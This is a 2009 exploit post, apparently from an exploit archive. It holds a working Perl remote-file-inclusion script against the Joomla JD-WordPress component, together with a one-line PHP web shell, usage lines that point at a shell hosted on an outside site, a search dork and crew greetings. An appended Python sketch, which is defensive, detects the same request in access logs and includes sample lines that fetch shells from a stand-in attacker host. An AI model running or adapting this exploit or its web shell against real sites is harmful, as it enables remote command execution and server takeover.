Joomla JD-WordPress remote file inclusion exploit. Version 2.0 RC2 is affected
Source: http://www.indonesiancoder.com  Author: Tukulesto  Published: 2009-10-20
#!/usr/bin/perl

#####
# [+] Author	: Don Tukulesto (root@indonesiancoder.com)
# [+] Date 	: October 20, 2009
# [+] Homepage	: http://www.indonesiancoder.com
# [+] Vendor 	: www.joomladeveloping.org
# [+] version 	: 2.0 RC2
# [+] Method	: Remote File Inclusion 
# [+] Dork 	: "Kill-9"+"IndonesianCoder"
# [+] Location 	: INDONESIA
# [~] Notes	: When we are together, sound the alarm. When we party, the silence will be broken.
# Me, him and them, crazy indeed, different indeed. No need to pretend, this is just how we are. ( SupermanIsDead ft. Shaggy Dog )
# to M3NW5	: Come back to your path, kid, do not turn away from "Him"
# to kaMtiEz	: thx !!!! 15 hours and finally got a result too :"> ( wait for me in your city )
# to MALINGSIAL	: TRULY THIEF IN ASIA ! N.A.T.O BIATCH !
# [~] How To	:
# perl tux.pl <target> <weapon url> cmd
# perl tux.pl http://127.0.0.1/path/ http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <?php system($_GET['cmd']); ?>
#####

use HTTP::Request;
use LWP::UserAgent;

$Tux = $ARGV[0];
$Pathloader = $ARGV[1];
$Contrex = $ARGV[2];

if($Tux!~/http:\/\// || $Pathloader!~/http:\/\// || !$Contrex){usage()}
head();

sub head()
{
    print "[o]============================================================================[o]\r\n";
    print " | Joomla JD-WordPress Vulnerability File Inclusion |\r\n";
    print "[o]============================================================================[o]\r\n";
}

while()
{
    print "[w00t] \$";
    while(<STDIN>)
    {
        $kaMtiEz=$_;
        chomp($kaMtiEz);
        $arianom = LWP::UserAgent->new() or die;
        $tiw0L = HTTP::Request->new(GET =>$Tux.'components/com_jd-wp/wp-feed.php?mosConfig_absolute_path='.$Pathloader.'?&'.$Contrex.'='.$kaMtiEz)or die "\nCould Not connect\n";
        $abah_benu = $arianom->request($tiw0L);
        $tukulesto = $abah_benu->content;
        $tukulesto =~ tr/[\n]/[�]/;
        if (!$kaMtiEz) {print "\nPlease Enter a Command\n\n"; $tukulesto ="";}
        elsif ($tukulesto =~/failed to open stream: HTTP request denied!/ || $tukulesto =~/: Cannot execute a blank command in /) {print "\nCann't Connect to cmd Host or Invalid Command\n";exit}
        elsif ($tukulesto =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
        if($tukulesto =~ /(.*)/)
        {
            $finreturn = $1;
            $finreturn=~ tr/[�]/[\n]/;
            print "\r\n$finreturn\n\r";
            last;
        }
        else {print "[w00t] \$";}
    }
}
last;

sub usage()
{
    head();
    print " | Usage: perl tux.pl <target> <weapon url> <cmd> |\r\n";
    print " | <Site> - Full path to execute ex: http://127.0.0.1/path/ |\r\n";
    print " | <Weapon url> - Path to Shell e.g http://www.indonesiancoder.org/shell.txt |\r\n";
    print " | <cmd> - Command variable used in php shell |\r\n";
    print "[o]============================================================================[o]\r\n";
    print " | IndonesianCoder Team | KILL-9 CREW | ServerIsDown | AntiSecurity.org |\r\n";
    print " | kaMtiEz, M3NW5, arianom, tiw0L, Pathloader, abah_benu, VycOd, Gh4mb4S |\r\n";
    print " | Jack-, Contrex, yadoy666, Ronz, noname, s4va, gonzhack, cyb3r_tron, saint |\r\n";
    print " | Awan Bejat, Plaque, rey_cute, BennyCooL, SurabayaHackerLink Team and YOU! |\r\n";
    print "[o]============================================================================[o]\r\n";
    print " | http://www.IndonesianCoder.org | http://www.AntiSecRadio.fm |\r\n";
    print "[o]============================================================================[o]\r\n";
    exit();
}
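
The request built by the script above is easy to recognise in web-server logs, because it places a URL in the mosConfig_absolute_path parameter of components/com_jd-wp/wp-feed.php. The following detection sketch is an added example, not part of the original post or the author's code; it assumes Apache combined-format access logs, and the function name find_include_attempts and every sample log line are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines (combined format); hosts and IPs are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Oct/2009:10:01:02 +0000] "GET /joomla/components/com_jd-wp/wp-feed.php'
    '?mosConfig_absolute_path=http://attacker.example/shell.txt?&cmd=id HTTP/1.1" 200 512',
    '203.0.113.7 - - [20/Oct/2009:10:01:09 +0000] "GET /components/com_jd-wp/wp-feed.php'
    '?mosConfig_absolute_path=%68ttp%3A%2F%2Fattacker.example%2Fs.txt%3F HTTP/1.1" 404 210',
    '198.51.100.4 - - [20/Oct/2009:10:02:00 +0000] "GET /index.php?option=com_content&id=3 HTTP/1.1" 200 8841',
    '198.51.100.9 - - [20/Oct/2009:10:03:00 +0000] "GET /index.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 90',
]

REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Two or more scheme characters before ':' so a Windows drive letter (C:) is not flagged.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]+:|//)', re.I)
PARAM = "mosconfig_absolute_path"
COMPONENT = "/components/com_jd-wp/wp-feed.php"


def find_include_attempts(lines):
    """Return one record per request that supplies the path variable in its query string."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        if not m:
            continue  # not an access-log request line
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so %68ttp%3A%2F%2F is seen as http://
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() != PARAM:
                continue
            hits.append({
                "ip": m["ip"],
                "status": int(m["status"]),
                "jd_wp": unquote(path).lower().endswith(COMPONENT),
                "remote": bool(REMOTE_RE.match(value)),
                "include": value,
            })
    return hits


if __name__ == "__main__":
    for hit in find_include_attempts(SAMPLE_LOG):
        print(hit)
```

The parameter is a Joomla configuration variable that ordinary clients have no reason to send, so every record is worth triage; `remote` marks values that would make PHP fetch code from another host, and `jd_wp` marks requests aimed at the component named on this page.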

 